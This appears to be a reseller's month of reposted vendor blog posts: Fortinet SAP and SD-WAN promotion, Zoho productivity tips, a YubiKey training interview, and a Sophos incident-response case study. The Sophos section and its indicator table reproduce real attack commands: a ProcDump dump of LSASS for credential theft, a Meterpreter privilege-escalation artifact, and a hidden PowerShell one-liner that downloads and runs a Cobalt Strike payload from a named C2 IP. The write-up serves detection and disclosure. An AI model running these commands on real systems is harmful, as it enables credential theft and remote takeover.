Month: October 2020

Fortinet Secures the Intelligent Enterprise Running SAP

SAP is among the world’s largest software companies, with some 92% of the Forbes Global 2000 using at least some of their enterprise application solutions. Most of these companies will deploy SAP S/4HANA in the cloud—either public or private. In fact, by 2027 some SAP customers will need to migrate to SAP S/4HANA as they have announced the end-of-life of older versions of their integrated application solutions (SAP Business Suite). Fortinet’s Dynamic Cloud Security offerings provide organizations the key security elements they require to help secure their SAP S/4HANA cloud deployments during this transition.

Securing SAP Environments With Fortinet’s Dynamic Cloud Security

Properly securing any enterprise application solution, such as Enterprise Resource Planning (ERP), is increasingly important for organizations. SAP Enterprise application solutions are a suite of integrated tools used to collect, store, manage, and interpret data from many business activities. For management teams, ERP is the key to understanding and managing their business. But for cybercriminals, ERP systems are an attractive target because ERP systems share data across every facet of the organization.

Fortinet has been working with leading ERP vendors of enterprise application solutions to provide carefully engineered and well-tested architectures for securing such systems, both in and out of the cloud. For example, Fortinet has recently published Oracle validated security architectures for Oracle solutions. Fortinet’s Dynamic Cloud Security portfolio is designed to help SAP customers secure their workloads across environments.

“Zuellig Pharma uses Fortinet’s Dynamic Cloud Security offerings to protect our SAP deployments across public and private cloud infrastructures,” shared Daniel Laverick, Head of SAP & IT Solutions at Zuellig Pharma. “Fortinet offers the broadest set of security offerings for securing workloads both on-premises and on any cloud. With Fortinet, we’ve gained unified visibility and control without hindering our ability to deliver seamless user experience to our customers worldwide.”

Securely Transitioning to SAP S/4HANA

A few years ago, SAP announced end-of-support for older SAP solutions by 2025, including:

ERP 6.0
Customer Relationship Management 7.0
Supply Chain Management 7.0
Supplier Relationship Management 7.0 applications
Business Suite powered by SAP HANA

S/4HANA was specifically designed to run in a virtualized environment like the cloud. But not all clouds are the same. As a result, there are actually different versions of the software designed for public and private cloud deployments. In many cases, customers will opt for a hybrid model, where the majority of SAP systems run in the cloud while some dedicated production systems remain on-premises. This can add complexity in terms of security across these deployments. Fortunately, Fortinet solutions support both public and private clouds, ensuring security for hybrid, multi-cloud, and on-premises environments.

“Fortinet’s Dynamic Cloud Security portfolio—including FortiWeb and FortiCWP—enables our customers to confidently secure their SAP data and applications,” shared Thomas Grimm, CEO at AddOn AG – Germany. “Through Fortinet, SAP workloads are protected consistently across the application, network, and platform stack, addressing the expanded attack surface with a consistent offering.”

Christian Steden, Managing Director at Evonet said, “As a Fortinet partner, Evonet provides our customers Fortinet’s broad range of advanced security technologies to protect their SAP deployments. Fortinet’s offerings natively integrate with SAP, enabling automated, centralized management and visibility that reduces management overhead for our customers.”

Addressing the ERP Threat Landscape with Fortinet’s Dynamic Cloud Security

ERP systems can be a target for bad actors as they provide access to a vast range of business information systems, including financial data, production systems, development, employee data, and more. Some of these attacks could be aimed at well-known SAP apps such as Fiori—S/4HANA’s web interface, the new user experience (UX) for SAP software and applications. It provides access to a set of applications that are used in regular business functions, like work approvals, financial apps, calculation apps, and various self-service apps. For organizations looking to enhance the security for their SAP deployments, Fortinet’s Dynamic Cloud security offerings provide visibility and control across cloud infrastructures, ensuring secure connectivity from the data center to the cloud.

Consider the following to enhance the security for SAP deployments:

A web-application firewall (WAF) to block web attacks, such as code injection, cross-site scripting, or SQL injection. Because these attacks may be based on zero-day threats, the WAF should utilize machine learning to differentiate between normal and abnormal traffic and should utilize sandboxing and AI-driven threat feeds to detect new attack types. The WAF should also secure API interfaces using API calls.
Cloud-based network firewalls to secure network traffic—including internal segmentation to reduce the extent of trust domains. In a zero-trust environment, all traffic should be encrypted, however, doing so may introduce performance issues—so firewall performance will be a key attribute.
An IPS (Intrusion Prevention System) to block attacks targeting system vulnerabilities.
Data Loss Prevention tools to block sensitive or confidential information leakage.
Cloud-native workload protection and/or CASB to monitor security policies, configuration, usage patterns, and compliance with security policies.

In addition to the above, endpoint protection, network access controls, central management, and centralized analytics should all be part of the security infrastructure if not already. In fact, the pillars of cybersecurity need to be brought into play—Security-Driven Networking for segmentation and securing data, Zero Trust Access (including endpoint security) to protect against identity theft-driven attacks, cloud security to secure data in the cloud and to identify misconfiguration and risk factors, and robust AI-Driven Security Operations to ensure timely threat feeds and remediation. Of course, all these should be woven into a broad, integrated, and automated cybersecurity platform, like the Fortinet Security Fabric, supported by a shared analytics and management plane.

Fortinet Can Help

Fortinet Dynamic Cloud Security Solutions can provide the necessary visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud.

Fortinet recently published a white paper on securing SAP deployments detailing the tools and architecture approach for different scenarios. Learn more about how to enhance the security for your SAP S/4HANA deployment by downloading the paper.

Learn how Fortinet’s dynamic cloud security solutions provide increased visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud.

Read these customer case studies to see how Hillsborough Community College and WeLab implement Fortinet’s dynamic cloud security solutions for secure connectivity from data center to the cloud.

Engage in our Fortinet user community (Fuse). Share ideas and feedback, learn more about our products and technology, or connect with peers.

As Fortinet partners, Net Universe offers all Fortinet devices and subscriptions with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/fortinet.
You can visit our Shop Online

An active adversary caught in the act – Sophos News

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out. This analysis is done with the goal of finding signals that could potentially be an indicator of an attack.

In this case, the signal was of a legitimate Microsoft’s Sysinternals tool. ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is for stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:Windowssystem32cmd.exe /C wmic /node:"SERVER NAME" process call create "C:PerfLogsprocdump.exe -accepteula -ma lsass C:PerfLogslsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:Windowssystem32cmd.exe /c echo 4d6b1c047b2 > \.pipe8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

With the knowledge that the adversary was using the Meterpreter, this would indicate they must have some kind of network connection to remotely send their commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to Bulgarian IP address 217.12.202.89 using the network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify –Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.

SophosLabs

The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s network logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet ,making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of having remote access. Moving cursors on the screen are somewhat of a giveaway.

The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to action on their objectives, catching them while they were still in the network propagation stages, laterally moving and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

IOAs / IOCs

ProcDump of LSASS	C:Windowssystem32cmd.exe /C wmic /node:”SERVER NAME” process call create “C:PerfLogsprocdump.exe -accepteula -ma lsass C:PerfLogslsass.dmp”
Meterpreter GetSystem	C:Windowssystem32cmd.exe /c echo 4d6b1c047b2 > \.pipe8eaee7
C2 IPv4	217.12.202.89
C2 payload URL	http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh
C2 port (Cobalt Strike)	50050
PowerShell to download and invoke Cobalt Strike payload	“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh’))”

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Fortinet Announces New Secure SD-WAN Appliance for Large & Complex WAN Deployments

FortiGate 200F Delivers Faster ROI Benefits and High Security Compute Ratings, Expands F-series Product Portfolio Powered by Purpose-built SD-WAN ASIC

“Change is the only constant in life.” – Heraclitus, Greek philosopher

If anything, 2020 has been a year of change. Over the last 9 months, I have had an opportunity to interact with hundreds of customers – and “change” was the common thread connecting them all. Every organization irrespective of their business vertical or segment is undergoing a transformational change whether it’s an evolving business model, having to adapt to a largely remote workforce, or newer IT initiatives with WAN Edge at the center. At Fortinet, change is not resisted, we embrace change to solve the unmet and unarticulated needs of our customers.

Expanding the Fortinet Secure SD-WAN F-series Product Portfolio

Fortinet’s SD-WAN journey began years ago, led with a security-driven networking approach that enabled us to deliver the industry’s first Secure SD-WAN solution. We have continued to innovate since then, delivering the industry’s first purpose-built processor designed to accelerate SD-WAN functionality without compromising on security performance, and offering a fully self-healing SD-WAN solution combined with centralized orchestration to meet the diverse needs of global customers. We’ve had tremendous success with our FortiGate F-series product portfolio, which is powered by a purpose-built SD-WAN processor. Over the years, we have continued to expand the F-series portfolio to meet changing customer requirements and deployment needs at every edge with multiple variants from built-in LTE, wireless, POE and most recently built-in bypass to deliver reliable connectivity during planned or unplanned outages.

The FortiGate 200F – The Newest Addition to the FortiGate F-series Portfolio

Today, we are excited to launch the FortiGate 200F, powered by Fortinet’s purpose-built SD-WAN processor in a 1RU form factor with 10GE-interface support to expand the fast-growing FortiGate F-series product portfolio. The FortiGate 200F series continues to leverage our successful security-driven networking approach to deliver a simple, scalable, and flexible Secure SD-WAN solution that customers can deploy across the home, branch, campus and multi-cloud to achieve faster ROI benefits. The FortiGate 200F is ideal for large complex SD-WAN deployments to meet high performance and scalability requirements for mid-size to large enterprises deploying at the campus or enterprise branch level.

If you are wondering if the FortiGate 200F meets the high-performance needs for your large global WAN deployment, the answer is most likely “yes!” FortiGate 200F delivers high Security Compute Ratings, a benchmark that compares the performance of Fortinet’s purpose-built ASIC-based product portfolio to other SD-WAN and NGFW vendors in that same price range that utilize generic CPUs for networking and security capabilities. The FortiGate 200F powered by a purpose-built SD-WAN processor enables the following Security Compute Ratings:

We believe that this new product addition will help further accelerate our Secure SD-WAN momentum and help our customers achieve digital transformation at all edges.

Learn more about the FortiGate 200F and all Fortinet Secure SD-WAN appliances.

Engage in our Fortinet user community (Fuse). Share ideas and feedback, learn more about our products and technology, or connect with peers.

As Fortinet partners, Net Universe offers all Fortinet devices and subscriptions with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/fortinet.
You can visit our Shop Online

Remote work and efficient file management

Remote work, once a privilege given to few, is now a viable alternative to the commute and grind of office life. As of June this year, an estimated 42% of the US labor force reported that they were working from home full-time, the highest it’s ever been. But as more and more businesses embrace remote work, a bigger question remains: what is the best way to boost collaboration between remote teams?

For most companies, the answer has been to use cloud-based file sharing and document management platforms. Cloud-based platforms, as a whole, are a godsend for remote workers, because they’re compatible on any computer, tablet, or smartphone, and can be accessed from literally anywhere. Massive enhancements and developments in cloud security over the last few years make this an even better option for businesses. However, when workers operate on different systems, the ability to collaborate, share, and interact becomes far more complicated.

For example, Google cloud-based servers require users to have a Gmail address. This means that your company email provider must be Google, unless workers log in from their personal email. Documents saved on Excel must be converted to Numbers if being sent to a MacBook using iWork. While so many businesses love cloud storage, many more complain about the lack of compatibility.

In this guide, we’ll discuss the office suite applications of Zoho Workplace – Zoho Writer, Zoho Sheet, and Zoho Show, and why they’re great alternatives to other more cumbersome platforms. Ensuring your entire team uses Zoho for their collaborative efforts will minimize mix-ups and technical difficulties, and encourage collaboration with their easy-to-use design and functionality.

Furthermore, if your team uses Zoho, your data is guaranteed never to be sold to third parties for profit.

Zoho Writer—in your own words but better

Zoho Writer is the perfect platform to create text documents and easily share feedback in real time. One of its unique selling points is that it removes the toolbar function as writers are typing, allowing them to focus completely on the words in front of them. This “distraction-free” design helps workers stay on the task at hand.

Writer is also equipped with aids to help you get the most out of your writing. The platform will give you a score based on your spelling, grammar, and several other important but often ignored criteria.

The level of readability and style are scored based on the amount of run-on sentences present in a document. The checker also looks out for the overuse of polysyllabic words, and gives users their average sentence length. This is a great option for anyone who’s managing a remote team that’s brilliant, but also not exactly Shakespearian.

Zoho Writer makes it easy for businesses to achieve continuous integration, or the organic collaboration between cross-functional teams, through ensuring software is delivered painlessly, with no downtime during deployments.

The app can also be used in any browser, and document sharing is compatible with Google Drive, iCloud, Dropbox, and even WordPress. And the platform comes with all the benefits found in an application like Microsoft Word, such as easy-to-use templates and digital signatures.

One of the advantages of sharing files using Writer is that the document can be collaborated on, even by the people outside of the organization. In case you are conducting an interview, the interview candidate can be given a link to a test with edit access, as a password-protected file, with an expiry date and time. Once their time is up, the external link will automatically become inaccessible and the reviewer can check the trail of the file and go through the answers. Sharing using the candidate’s email address also ensures that the test is taken only by the intended participant. This feature can be further extended for co-authoring books, creating collaborative reports and so on.

Zoho Show—taking your slides to the next level

Zoho Show is one of the most impressive apps found on Zoho—it’s a show-stealer, if you will. Zoho Show allows users to create powerful slide presentations with the ability to share via a URL. Collaborators can also comment on the document and track changes through the history function.

The slideshow platform allows presenters to create impressive animations. But perhaps the best feature is the function that allows users to record their presentations as if they were being virtually done live. This way, remote presenters can focus their energy on Q&A sessions while they can be rest assured that their presentation is flawless.

The presentation can be published as well as broadcast in real time, and can be made accessible to non-members of the organization.

Zoho Sheet—more data with less work

Zoho Sheet lets you create spreadsheets, but with an added feature called Zia Insights that can convert your data instantly and automatically into pie charts and other graphics that add a bit of visual zest and readability to your data. It’s a great way to impress your boss, especially if they’re only used to Excel. There are also over three hundred and fifty built-in formulas, as well as the ability to create your own custom functions.

You can even program Zoho Sheet to retrieve data from Zoho Mail, Books, and many other Zoho apps. The seamless sharing and collaboration that can be achieved through Zoho means your workers only need a secure, stable internet connection to get the job done. A good rule is to make sure your internet can transmit at least 25 Mbps in order for data to travel fast enough and avoid lag issues.

And to add another layer of seamless collaboration to the mix, you can use Zoho Cliq to chat with colleagues and stakeholders, on top of the real-time data collaboration you get from Sheet.

WorkDrive

WorkDrive integrates all three of these collaboration apps, and acts as a single home for all of your office files. You can create your files in a team, group, or personal folder depending on your needs. Having a document in a Team Folder also allows you to control when your file is ready for the rest of the team and what level of access each member can have.

Conclusion

When it comes to remote work, nothing is more important than staying in sync. Don’t waste valuable time dealing with technical difficulties, hard-to-use platforms, or incompatible devices. Adopt a platform that’s easy to use so you can focus on doing what you need to do for the success of your business.

Author bio: Gary Stevens

Gary Stevens is the CTO of Hosting Canada, a website that provides expert reviews on hosting services and helps readers build online businesses and blogs.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

Improve your company’s cyber security training with top tips from a behavioral researcher

Today marks the final stretch of National Cyber Security Awareness Month (NCSAM), and for the final week, we decided to sit down with Sal Aurigemma, PhD, Associate Professor of Computer Information Systems at the University of Tulsa, to get his take on enterprise security training.

As with many other things that have been impacted by COVID, enterprise security training is no different. Many organizations are heavily reliant on training and preparedness programs at the moment to help employees navigate the adoption of new technologies and processes, as well as mitigate threats from the rising number of phishing and man-in-the-middle attacks. But just how effective are these programs, and are they actually influencing user behavior? We’ll find out.

Dr. Aurigemma has more than 20 years of experience in the information technology industry as both an educator and behavioral researcher. Dozens of students come through Dr. Aurigemma’s undergraduate and masters programs each year to learn about proper cyber security hygiene using tools like the YubiKey, and he’s explored topics related to security policy compliance and end-user security practices in his research over the years.

What is the biggest problem you see with employee training programs today?

Perhaps the most frustrating problem I see in the organizations I have worked for, and those I work with today, is a pervasive “check-box” approach to information security awareness training. By this I mean one of two things, and often both:

1) It is still somewhat treated as a one-and-done compliance checklist that is completed on an annual or quarterly basis. With the possible exception of anti-phishing testing where organizations use tools and services to run their own phishing campaigns, there is little to no reinforcement of the reason behind why it’s important to safeguard the organization.

2) A one-size-fits-all training doesn’t work. We know that we have certain sectors of our workforce that are more likely to be targeted by potential adversaries. Yet, in many cases, the training given across the workforce is largely the same, even though the threat and techniques can vary based upon the target.

What are three things organizations can do to improve the efficacy of their cyber security training programs?

My number one recommendation is the hardest to achieve – make sure that your infosec awareness training is properly resourced. This means that you have enough people running the program and those people are properly trained to create and administer effective training programs. If your organization treats security training as a collateral duty, do not be surprised when it fails to meet expectations.

Secondly, ditch the one-size-fits-all approach, at least when it comes to security training and attention. We know certain groups of employees are targeted more often than others, or targeted in different ways, so we need to prepare them accordingly. For example, senior executives, IT system administrators, and HR team members are the top three target populations, and they are typically targeted using different techniques. Their training should reflect that. The same goes for different employee demographics — the lessons or examples that are most impactful for one group of employees may be very different for others.

Finally, I would recommend that every organization develops a set of training outcome metrics and then use them to continually assess and improve your training programs. This can be challenging, but it is worth the effort. If you have certain employees or employee groups that keep “failing” some aspect of your training, that is a sign that your training and/or security mitigations are not sufficient. But, you won’t know that unless you measure and monitor.

How do you foresee the influx of remote work, spurred by COVID, impacting the approach to cyber security training? How should organizations adjust and what should they consider that maybe they haven’t before?

My primary fear is that the increase in remote work will further distance employees from the security training staff and the messages they bring. What we don’t want is more “watch this video to complete your training” requirements that replace impactful interactions with the organization’s security staff (whether face-to-face or virtual).

Given that the work-from-home movement is here for a while, or possibly here to stay for some organizations, it is somewhat critical to do a complete review of your security training needs and develop a plan to adjust accordingly. For example, does your current security training plan account for the significantly greater emphasis on remote connectivity and interactions, and the increasing threats — like phishing and man-in-the-middle attacks — that come with that? Do your employees understand which threats are now more prevalent or dangerous than before because of the extension of the workplace to their home office network?

In an ideal world, this shift to remote work would be the catalyst organizations need to embrace a more tailored security awareness training approach that accounts for an employee’s job role, location, access, experience level, and other demographic characteristics. If and when we return to a more normal workplace life, we will be better positioned to continue to adapt and improve our security awareness programs.

Not all employees will follow through with best practices, even with a perfect training program. What are the primary factors that inhibit users from adopting new security technologies or practices?

A significant portion of my research activities are focused on better understanding inhibitors and facilitators of sound security behaviors, and if I had to narrow it down to three potential reasons why people do not take security actions, even when they know they should, I would say it is due to:

1) Threat apathy

2) Response efficacy

3) Inconvenience

Threat apathy occurs when individuals do not pay attention to security because they do not consider the recommended or required security action (and its related threat) to be important. It could be because they don’t feel important enough to be a target of cybercriminals, or that they believe their online accounts aren’t worth stealing. Overcoming threat apathy requires the use of convincing and compelling security messaging that explains why the action is important, on a personal and organizational level, and the potential consequences of failure.

Response efficacy is an academic way of saying that people may not know enough about, or have confidence in, a particular recommended security action. A great example of this is two-factor authentication (2FA). It is not a secret that we should use 2FA wherever and whenever we can. However, most people don’t know the differences between the various types of 2FA mechanisms, which ones are more secure than others, or how they work. Security training programs should not just articulate the threat and required security actions; they must also make it clear that the requested actions are sufficient to the task and, to some extent, explain how.

Inconvenience is a real factor that influences our security behaviors. As humans, we are constantly calculating the costs and benefits of doing things and we generally know what happens when the costs outweigh the benefits. Enterprises have to design and implement security mitigations with this in mind and work to balance maximizing the security benefit while minimizing or eliminating the inconvenience factor. If we don’t design security mitigations with the end-user in mind, the end-user may find ways to avoid or diminish the effectiveness of those mitigations.

On the contrary, what have you observed to be primary motivators for adopting new security technologies or practices?

One of the latest research trends in behavioral information security that I feel strongly about is a shift from sanction or threat-based compliance to one that adds positive reinforcement and messaging. By this I mean that many security policies and training programs are focused on “compliance-or-else” messaging. In short, employees have something to fear if they don’t follow the rules. Fear-uncertainty-doubt (FUD) is used too much in the cyber security literature and it also lives in our training programs.

While I do believe that there needs to be some actual consequences for willful and malicious non-compliance with security rules, we also know that fear alone is not a good enough motivator. We see that in many aspects of modern society, not just in cyber security. My fellow researchers and I have conducted numerous experiments that show that building up and emphasizing the positive psychological capabilities of end-users to combat a security threat is significantly more effective than relying on fear and promises of reprisal alone. We have found that end-users are much more likely to adopt new security technologies and practices when they feel:

1) More capable of taking security actions and working through issues related to the required tasks

2) More hopeful that their actions are effective

3) More optimistic about their resulting security posture

It’s impossible to eliminate the element of human error, especially when it comes to protection against sophisticated phishing or man-in-the-middle attacks, so what other steps should organizations be taking — outside of training — to ensure they have a comprehensive approach to security?

In my opinion, the best way to minimize the effect of human error (or conscious rebellion) on security practices is to reduce the opportunities to make bad decisions. This means designing your security mitigations in a way that reduces the cognitive load and choices your end-users have to make.

A perfect example of this is having your employees use YubiKeys for 2FA or passwordless login. At a time when phishing attacks are virtually undetectable — even to the most well-trained eye — this is exactly the type of technology that you should be using to support your training initiatives. But make sure that the burden of configuring the YubiKeys does not fall all on the end-user and make sure that you are using the right form factor for the employee’s electronic devices.

Likewise, you don’t want your employees or end-users choosing passwords that are weak or previously compromised. But, don’t put the onus on the end-user to know what that means – do it for them when you are registering accounts or during password changes. Offloading as many volitional security activities as possible from your end-users and limiting the opportunities to deviate from strong security practices should be primary considerations for every security activity.

—

Learn more about how the YubiKey can complement your organization’s cyber security training endeavors with a fool-proof 2FA solution proven to eliminate account takeovers from phishing and man-in-the-middle attacks.

Net Universe offers all Yubikeys with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/yubikey.
You can visit our Shop Online

Tips to improve remote communication and collaboration

With remote working conditions, your employees may find it difficult to interact and communicate with their colleagues. If this goes unchecked by your organization, they may develop a sense of loneliness and isolation, which in turn may lead to loss of employee morale and engagement.

To combat this, organize frequent virtual meetings and conversations between your employees. Need a starting point? Here are some ways to improve remote communication and collaboration in your organization:

Run virtual meetings regularly to help employees work as a team and generate new ideas. Choose the right meeting tool, allot time for casual chitchat.

Make your employees aware of all the communication channels available to them.

Educate your managers on how to improve communication among their team members.

Encourage a 360-degree feedback system that supports employee recognition and helps employees understand their performance from different perspectives.

Use virtual idea boards to keep all your employees on the same page.

Conduct fun virtual activities that can help your employees relax.

Read more about these tips to improve remote communication in our HR Knowledge Hive.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

9 pointers to make pop-ups an effective lead generation tool

This is a guest post by Abbey Claire Dela Cruz, Marketing Manager at Poptin.

Pop-ups vary in size and style. While creating them is incredibly easy, how you execute them makes all the difference. If done right, pop-ups can help you achieve great results with your lead generation strategies. They can engage with your target audience and usher them to your funnel until they’re ready to give you their email addresses.

Here are some of the most effective hacks to help you make pop-ups an effective lead generation tool.

1. Personalize your message

Want a surefire way to grab the attention of your visitors? Try personalizing your pop-ups. There are many different advanced targeting options that enable you to show a specific pop-up message to a certain audience, like for first-time visitors, or people from a specific country, traffic source, web page, and more.

2. Offer a lead magnet they can’t say no to

The value of your offer can make or break the effectiveness of your conversion funnel. Most successful businesses rely on lead magnets in exchange for visitors’ contact information. And most premium content that acts as a lead magnet on pop-ups is downloadable ebooks, free shipping, webinar slots, discounts, and coupon codes, among many other enticing offerings that can encourage sign-ups.

3. Make it easy for visitors to exit your pop-up

Without a clear exit method, your bounce rate will continue to spike, and next thing you know, you’re losing potential subscribers left and right.

4. Reduce friction and distractions

When creating your own pop-up, design it in a way that visitors can simply input their contact information with ease. If you include a lot of unnecessary fields, you can end up losing them along the way.

If you think every element of your design is important, run an A/B test to see how you can best optimize it for better performance and results.

5. Timing and location make all the difference

Pop-ups, if implemented correctly, can drive the best user browsing experience. However, if you do it wrong, expect to have a low conversion rate.

To overcome this, study your audience’s behavior and come up with a list of triggers to help you execute your pop-ups at the right time. Side by side with timing is the location. There are messages that you can just put on slide-ins, and then there are those that are most effective on a full-screen overlay.

6. Invest in visual elements

As the saying goes, a picture is worth a thousand words. A high-resolution image that encapsulates what your lead magnet is about will let visitors know in an instant what you want to offer them in return. Visual elements also allow them to perceive your brand’s tone and message without distraction.

Just make sure that your sign-up button is emphasized, and the call to action is as clear as day.

7. Show scarcity

According to the scarcity principle in social psychology, humans tend to value scarce things overabundant things.

With this in mind, emphasizing how limited your slots are can drive better results than just inviting them to a certain event. Moreover, inviting them to sign up to get sneak-peek updates on an upcoming sale can equally work in your favor.

8. Add urgency with a countdown timer

Potential clients don’t want to miss something they know they won’t have access to in the future. With this in mind, adding a sense of urgency through a countdown timer can help achieve faster conversions when you’re trying to gather leads.

9. Include social proof

Social proofs are considered a powerful persuasion technique to gain leads. They’re used to establish your credibility and reputation as a leader in the industry.

They are more prominent on websites and landing pages, but they can be also effective on pop-ups. For example, if you’re promoting an online course, include a nice testimonial from a previous student to encourage potential enrollees to also subscribe.

Start creating pop-ups with Poptin for Zoho CRM and learn to integrate your leads directly into your Zoho CRM account.

Work smarter by adding new capabilities to Zoho CRM with business solutions from Zoho Marketplace.

The post 9 pointers to make pop-ups an effective lead generation tool appeared first on Zoho Blog.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

Streamlined and intuitive app management in the Admin console with new unified experience

[ad_2]

Net Universe offers all Google devices with worldwide Delivery Services.
